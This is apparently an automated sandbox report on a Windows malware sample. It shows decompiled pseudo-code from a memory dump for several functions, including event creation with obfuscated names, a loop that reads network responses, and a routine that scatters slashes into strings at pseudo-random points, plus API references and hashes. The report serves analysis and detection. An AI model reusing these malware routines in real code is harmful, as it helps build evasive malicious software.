								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00FA4A9C(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00FA949F(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00FAD168) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00fa674f
0x00fa675b
0x00fa6761
0x00fa6766
0x00fa676a
0x00fa68c7
0x00fa68cb
0x00fa68cb
0x00fa6770
0x00fa6774
0x00fa677a
0x00fa677b
0x00fa6786
0x00fa678c
0x00fa6791
0x00fa6794
0x00fa67ae
0x00fa67ba
0x00fa67c3
0x00fa67cd
0x00fa67d2
0x00fa67d4
0x00fa67d7
0x00fa6885
0x00fa688b
0x00fa689c
0x00fa68af
0x00fa68bf
0x00000000
0x00fa68c4
0x00fa67e0
0x00fa67e7
0x00fa67eb
0x00fa67f1
0x00fa67f3
0x00fa67f5
0x00fa67f7
0x00fa67f9
0x00fa6803
0x00fa6808
0x00fa680a
0x00fa680c
0x00fa680d
0x00fa680e
0x00fa680f
0x00fa6816
0x00fa681d
0x00fa6820
0x00fa6820
0x00fa67ed
0x00fa67ed
0x00fa67ed
0x00fa6828
0x00fa6830
0x00fa6839
0x00fa683e
0x00fa683e
0x00fa6843
0x00000000
0x00000000
0x00fa6845
0x00fa6848
0x00fa6852
0x00000000
0x00000000
0x00fa6854
0x00fa6854
0x00fa685e
0x00fa683e
0x00fa6843
0x00000000
0x00000000
0x00000000
0x00fa6843
0x00fa6868
0x00fa686b
0x00fa686e
0x00fa6875
0x00fa6875
0x00fa6882
0x00000000
0x00fa6882
0x00fa677d
0x00fa6781
0x00fa6782
0x00fa6784
0x00000000
0x00000000
0x00000000
0x00fa6784
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00FA67F9
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00FA680F
memset.NTDLL ref: 00FA68AF
memset.NTDLL ref: 00FA68BF

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 8a09113f8ec5bb5f5d3261742c8d6a4dc4fdce3fc5ac1f8d911288a6e56fc3a9
Instruction ID: 4f4721970c381db180aaeb75d4384c27690745ecfc75b15de6d9c1aab7b0e1c7
Opcode Fuzzy Hash: 8a09113f8ec5bb5f5d3261742c8d6a4dc4fdce3fc5ac1f8d911288a6e56fc3a9
Instruction Fuzzy Hash: 1841D5B1A00209ABDB10DFA8CC41FEE7778EF46720F148529F915E7181DB74AD58EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA6A74, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00FA6A74(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_push( &_v24);
				_push(1);
				_push(0);
				if( *0xfad138() != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E00FA550F(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0xfad224, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E00FAA07B(_v20);
							if(_v8 == 0) {
								_v8 = E00FA9BAA(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x00fa6a7c
0x00fa6a7f
0x00fa6a88
0x00fa6a8b
0x00fa6a8e
0x00fa6a96
0x00fa6b94
0x00fa6b9f
0x00fa6ba2
0x00fa6baa
0x00fa6bb1
0x00fa6bb1
0x00fa6ba4
0x00fa6ba7
0x00fa6ba7
0x00000000
0x00fa6ba7
0x00fa6a9f
0x00000000
0x00000000
0x00fa6aa8
0x00fa6aa9
0x00fa6aab
0x00fa6ab4
0x00fa6b8b
0x00000000
0x00fa6b8b
0x00fa6ac0
0x00fa6ac7
0x00fa6aca
0x00fa6b79
0x00fa6b80
0x00fa6b80
0x00fa6b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00fa6ad0
0x00fa6ad0
0x00fa6ad0
0x00fa6ad0
0x00fa6ad5
0x00fa6ad7
0x00fa6ad7
0x00fa6ae4
0x00fa6aec
0x00000000
0x00000000
0x00fa6aee
0x00fa6afb
0x00fa6b01
0x00fa6b01
0x00fa6b04
0x00000000
0x00000000
0x00fa6b11
0x00fa6b25
0x00fa6b5b
0x00fa6b5e
0x00fa6b61
0x00fa6b69
0x00fa6b74
0x00fa6b74
0x00000000
0x00fa6b69
0x00fa6b27
0x00fa6b2e
0x00fa6b36
0x00000000
0x00000000
0x00fa6b38
0x00fa6b43
0x00fa6b46
0x00000000
0x00fa6b4d
0x00fa6b4d
0x00000000
0x00fa6b4d
0x00fa6b46
0x00fa6b0e
0x00000000
0x00fa6b50
0x00fa6b50
0x00000000

APIs

GetLastError.KERNEL32 ref: 00FA6B94

Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B

GetLastError.KERNEL32 ref: 00FA6B08
WaitForSingleObject.KERNEL32(00000000), ref: 00FA6B18
GetLastError.KERNEL32 ref: 00FA6B38

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: f4e531a3f6805008a48edf8f7bc32f22cc0768f5a13718326fa9a5130c11fa26
Instruction ID: 2ba781bd81458a18892528ca870a67a7621c9b7d818642bcaf9d932a902130ca
Opcode Fuzzy Hash: f4e531a3f6805008a48edf8f7bc32f22cc0768f5a13718326fa9a5130c11fa26
Instruction Fuzzy Hash: 2641F9F1E00209EFDF10DFA4D9849AEBBB9FF46394B248469E402E3151D7359E40EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FA50B5, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00FA50B5(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xfad228; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xfad230; // 0x2a9a5a8
				_t3 = _t8 + 0xfae84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E00FAA090(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xfad234, 1, 0, _t30);
					E00FAA07B(_t30);
				}
				_t12 =  *0xfad214; // 0x2000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E00FA229C() == 0) {
						_t28 =  *0xfad100( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E00FA8134(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00FAA3FC(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00fa50b6
0x00fa50bd
0x00fa50c7
0x00fa50cb
0x00fa50d1
0x00fa50de
0x00fa50e5
0x00fa50e9
0x00fa50fb
0x00fa50fd
0x00fa50fd
0x00fa5102
0x00fa5109
0x00fa5114
0x00fa512a
0x00fa512e
0x00fa5130
0x00fa5135
0x00fa5135
0x00fa5142
0x00fa5146
0x00fa514a
0x00000000
0x00000000
0x00fa5158
0x00fa515c
0x00000000
0x00000000
0x00fa515c
0x00fa5146
0x00000000
0x00fa515e
0x00fa515e
0x00fa515e
0x00fa5164
0x00fa5166
0x00fa5166
0x00fa5170
0x00fa5174
0x00fa5186
0x00fa5186
0x00fa518a
0x00fa5190
0x00fa5190
0x00fa5193
0x00fa5195
0x00fa5198
0x00fa5198
0x00fa519f
0x00fa51a5
0x00fa51a5

APIs

Part of subcall function 00FAA090: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00FA987E,74666F53,00000000,?,00000000,?,?,00FA726B), ref: 00FAA0C6
Part of subcall function 00FAA090: lstrcpy.KERNEL32(00000000,00000000), ref: 00FAA0EA
Part of subcall function 00FAA090: lstrcat.KERNEL32(00000000,00000000), ref: 00FAA0F2

CreateEventA.KERNEL32(00FAD234,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00FA2649,?,?,?), ref: 00FA50F4

Part of subcall function 00FAA07B: HeapFree.KERNEL32(00000000,00000000,00FA8705,00000000,?,?,00000000,?,?,?,?,?,?,00FA2540,00000000), ref: 00FAA087

WaitForSingleObject.KERNEL32(00000000,00004E20,00FA2649,00000000,?,00000000,?,00FA2649,?,?,?,?,?,?,?,00FA9D1C), ref: 00FA5152
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00FA2649,?,?,?), ref: 00FA5180
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00FA2649,?,?,?), ref: 00FA5198

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 3b7e19cdca46c0c3272824f1c6746e4bb8a021d364609fbbb623447281fa6580
Instruction ID: 33b324579447a64be9456fbdc561622b21ce6eb3d4c4a9abbd414b73affa1b95
Opcode Fuzzy Hash: 3b7e19cdca46c0c3272824f1c6746e4bb8a021d364609fbbb623447281fa6580
Instruction Fuzzy Hash: 2721F1F2E00B16ABD7215B689C44B6B73E9AF4BB70F054624F902DB290DB74CC05A690

Uniqueness

Uniqueness Score: -1.00%

Function 00FA259A, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00FA259A(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E00FA8E87(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00FA8CA3(_t23);
						}
					}
					return _t38;
				}
				if(E00FA94F1(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xfad234, 1, 0,  *0xfad2f0);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00FA275C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00FA8760(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00FA72B8(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00FA50B5( &_v32, _t39);
					goto L13;
				}
			}

0x00fa259a
0x00fa25a7
0x00fa25ad
0x00fa25ae
0x00fa25af
0x00fa25b0
0x00fa25b1
0x00fa25b5
0x00fa25c1
0x00fa25c5
0x00fa264d
0x00fa264d
0x00fa2650
0x00fa2652
0x00fa265a
0x00fa2660
0x00fa2663
0x00fa2663
0x00fa2660
0x00fa266e
0x00fa266e
0x00fa25d8
0x00fa25da
0x00fa25da
0x00fa25f1
0x00fa25f5
0x00fa25f8
0x00fa2603
0x00fa260a
0x00fa260a
0x00fa2616
0x00fa2617
0x00fa2625
0x00fa2619
0x00fa2619
0x00fa261a
0x00fa261b
0x00fa261c
0x00fa261d
0x00fa261e
0x00fa261e
0x00fa262a
0x00fa262f
0x00fa2631
0x00fa2633
0x00fa2633
0x00fa263a
0x00000000
0x00fa263c
0x00fa263c
0x00fa2649
0x00000000
0x00fa2649

APIs

CreateEventA.KERNEL32(00FAD234,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00FA9D1C,?,00000001), ref: 00FA25EB
SetEvent.KERNEL32(00000000,?,?,?,?,00FA9D1C,?,00000001,00FA7299,00000002,?,?,00FA7299), ref: 00FA25F8
Sleep.KERNEL32(00000BB8,?,?,?,?,00FA9D1C,?,00000001,00FA7299,00000002,?,?,00FA7299), ref: 00FA2603
CloseHandle.KERNEL32(00000000,?,?,?,?,00FA9D1C,?,00000001,00FA7299,00000002,?,?,00FA7299), ref: 00FA260A

Part of subcall function 00FA275C: WaitForSingleObject.KERNEL32(00000000,?,?,?,00FA262A,?,00FA262A,?,?,?,?,?,00FA262A,?), ref: 00FA2836
Part of subcall function 00FA275C: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00FA262A,?,?,?,?,?,00FA9D1C,?), ref: 00FA285E

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEvent$CreateHandleObjectSingleSleepWait
String ID:
API String ID: 467273019-0
Opcode ID: b52a3375f92544262a39544e9e2837ceec024d5f50c63e957caa0df4c5c6ae4b
Instruction ID: a2c1a9bebd85f8b8c73d72ab8fd4fdf313fe73a2155dda3afaf1dafad21d7643
Opcode Fuzzy Hash: b52a3375f92544262a39544e9e2837ceec024d5f50c63e957caa0df4c5c6ae4b
Instruction Fuzzy Hash: 3B2168F3E01219EBCB50AFE8CC859AE73B9AF46350B058425F511E7200DB74DD45EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FA53E6, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00FA53E6(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xfad1f0, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xfad208; // 0x62730d45
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xfad208 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x00fa53ee
0x00fa53f1
0x00fa53f7
0x00fa540f
0x00fa5413
0x00fa5416
0x00fa5418
0x00fa541b
0x00fa541d
0x00fa5420
0x00fa5422
0x00fa5422
0x00fa5424
0x00fa542f
0x00fa5434
0x00fa5445
0x00fa544d
0x00fa5452
0x00fa5455
0x00fa5458
0x00fa545a
0x00fa5460
0x00fa5463
0x00fa5463
0x00fa5463
0x00fa546e
0x00fa5473
0x00fa547d

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00FA4A7F,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA53F1
RtlAllocateHeap.NTDLL(00000000,?), ref: 00FA5409
memcpy.NTDLL(00000000,03A49630,-00000008,?,?,?,00FA4A7F,00000000,?,00000000,00FA3E0F,00000000,03A49630), ref: 00FA544D
memcpy.NTDLL(00000001,03A49630,00000001,00FA3E0F,00000000,03A49630), ref: 00FA546E

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 4c8aec98c5bd665e8d9e4ee94f4a1041b24d964a0ba7a8f9f451e45a48987681
Instruction ID: f2a481873453a3dfe8d86430be73e140f169e02d33549172beb06cafe400bbab
Opcode Fuzzy Hash: 4c8aec98c5bd665e8d9e4ee94f4a1041b24d964a0ba7a8f9f451e45a48987681
Instruction Fuzzy Hash: 3F1136B2A00218ABD710DB69DC88E9EBBEEDB86360B144276F805C7150E6709E00E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA83FE, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00FA83FE(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00FA550F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xfac2bc);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xfac2bc);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x00fa8409
0x00fa840d
0x00fa840f
0x00fa8410
0x00fa8418
0x00fa8418
0x00fa841c
0x00000000
0x00000000
0x00fa8413
0x00fa8414
0x00fa8417
0x00fa8417
0x00fa8424
0x00fa842b
0x00fa842f
0x00fa8437
0x00fa843d
0x00fa843f
0x00fa8444
0x00fa8448
0x00fa844a
0x00fa844d
0x00fa8454
0x00fa8454
0x00fa845e
0x00fa8461
0x00fa8464
0x00fa8464
0x00fa8470
0x00fa8470
0x00fa847d

APIs

StrChrA.SHLWAPI(?,00000020,00000000,03A4962C,?,?,?,00FAA34D,03A4962C,?,?,00FA7260), ref: 00FA8418
StrTrimA.SHLWAPI(?,00FAC2BC,00000002,?,?,?,00FAA34D,03A4962C,?,?,00FA7260), ref: 00FA8437
StrChrA.SHLWAPI(?,00000020,?,?,?,00FAA34D,03A4962C,?,?,00FA7260,?,?,?,?,?,00FA258B), ref: 00FA8442
StrTrimA.SHLWAPI(00000001,00FAC2BC,?,?,?,00FAA34D,03A4962C,?,?,00FA7260,?,?,?,?,?,00FA258B), ref: 00FA8454

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 308d854354e53fc911953270ac5cd261db95434bd470b3db677565ef78b8db93
Instruction ID: d1ef256614e681c475d0f8ee3c53665e2adf90eaf00e82b52d0449176ab2bbe0
Opcode Fuzzy Hash: 308d854354e53fc911953270ac5cd261db95434bd470b3db677565ef78b8db93
Instruction Fuzzy Hash: 5D0156B1A053165FD221DF559C49B2B7E98FF8B7A0F110519FD45D7241EBA4CC02A2E1

Uniqueness

Uniqueness Score: -1.00%

Function 00FAA090, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00FAA090(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E00FA9067(_t8, _t1);
				_t16 = E00FA550F(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E00FA8228(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E00FA550F(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E00FAA07B(_t16);
				}
				return _t18;
			}

0x00faa09b
0x00faa09c
0x00faa09f
0x00faa0a1
0x00faa0ac
0x00faa0b0
0x00faa0b5
0x00faa0b9
0x00faa0c1
0x00faa0c6
0x00faa0ce
0x00faa0ce
0x00faa0d7
0x00faa0db
0x00faa0e1
0x00faa0e4
0x00faa0ea
0x00faa0ea
0x00faa0f2
0x00faa0f2
0x00faa0f9
0x00faa0f9
0x00faa104

APIs

Part of subcall function 00FA550F: RtlAllocateHeap.NTDLL(00000000,00000000,00FA863D), ref: 00FA551B

Part of subcall function 00FA8228: wsprintfA.USER32 ref: 00FA8284

lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00FA987E,74666F53,00000000,?,00000000,?,?,00FA726B), ref: 00FAA0C6
lstrcpy.KERNEL32(00000000,00000000), ref: 00FAA0EA
lstrcat.KERNEL32(00000000,00000000), ref: 00FAA0F2

Strings

Soft, xrefs: 00FAA09C, 00FAA0B5

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
String ID: Soft
API String ID: 393707159-3753413193
Opcode ID: cb9155451aa8025f730f13f679ed45507ddd4403077b6f4bec0f77ada7df389c
Instruction ID: 9e810c54c42350f4d82fb62a919af54c7b3c753b22f1dc053efcfe66da641466
Opcode Fuzzy Hash: cb9155451aa8025f730f13f679ed45507ddd4403077b6f4bec0f77ada7df389c
Instruction Fuzzy Hash: AE01D6B250060ABBCB127BB89C84AEF3BAD9F87755F04C020F90595101DF78C989E7E2

Uniqueness

Uniqueness Score: -1.00%

Function 00FA4ACE, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FA4ACE() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xfad224; // 0x298
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xfad264; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xfad224; // 0x298
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xfad1f0; // 0x3650000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00fa4ace
0x00fa4ad5
0x00fa4b1f
0x00fa4b21
0x00fa4b21
0x00fa4ad9
0x00fa4adf
0x00fa4ae4
0x00fa4ae8
0x00fa4aee
0x00fa4af5
0x00000000
0x00000000
0x00fa4af7
0x00fa4afc
0x00000000
0x00000000
0x00000000
0x00fa4afc
0x00fa4afe
0x00fa4b06
0x00fa4b09
0x00fa4b09
0x00fa4b0f
0x00fa4b16
0x00fa4b19
0x00fa4b19
0x00000000

APIs

SetEvent.KERNEL32(00000298,00000001,00FAA580), ref: 00FA4AD9
SleepEx.KERNEL32(00000064,00000001), ref: 00FA4AE8
CloseHandle.KERNEL32(00000298), ref: 00FA4B09
HeapDestroy.KERNEL32(03650000), ref: 00FA4B19

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 01ddd44e86983925fbb506eaee42202db2b1bd29205a15ca5d46df397d65174d
